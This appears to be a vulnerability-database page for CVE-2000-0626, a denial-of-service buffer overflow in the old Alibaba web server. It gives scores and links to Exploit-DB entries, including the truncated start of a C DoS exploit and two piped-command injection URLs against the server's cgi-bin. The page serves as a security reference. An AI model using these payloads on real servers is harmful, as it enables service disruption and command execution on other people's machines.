CVE-2000-0626
published 2000-07-18CVE-2000-0626: Buffer overflow in Alibaba web server allows remote attackers to cause a denial of service via a long GET request.
PriorityP420medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
6.09%
92.5th percentile
Buffer overflow in Alibaba web server allows remote attackers to cause a denial of service via a long GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| computer_software_manufaktur | alibaba | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Computer Software Manufaktur Alibaba 2.0 - Denial of Service
exploitdb·2000-07-18
CVE-2000-0626 Computer Software Manufaktur Alibaba 2.0 - Denial of Service
Computer Software Manufaktur Alibaba 2.0 - Denial of Service
---
// source: https://www.securityfocus.com/bid/1482/info
It is possible for a user to initiate a denial of service against Alibaba Web Server. Sending an unusually long GET request (> 8000 bytes) to the server will cause the service to stop responding. A restart of the server service is required in order to gain normal functionality.
/*
Description: DoS against Alibaba 2.0 WebServer by wildcoyote
Comments : Based on advisorie by Prizm
Platforms : Alibaba runs on Win95/98/NT
Flamez to : [email protected]
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if
Exploit-DB
Computer Software Manufaktur Alibaba 2.0 - Piped Command
exploitdb·2000-07-18
CVE-2000-0626 Computer Software Manufaktur Alibaba 2.0 - Piped Command
Computer Software Manufaktur Alibaba 2.0 - Piped Command
---
source: https://www.securityfocus.com/bid/1485/info
Alibaba Web Server fails to filter piped commands when executing cgi-scripts. This can be used to execute commands with the privileges of the web server process on a target machine.
http://victim/cgi-bin/post32.exe|echo%20>c:\text.txt
http://victim/cgi-bin/lsindex2.bat|dir%20c:\[dir]
No writeups or analysis indexed.
2000-07-18
Published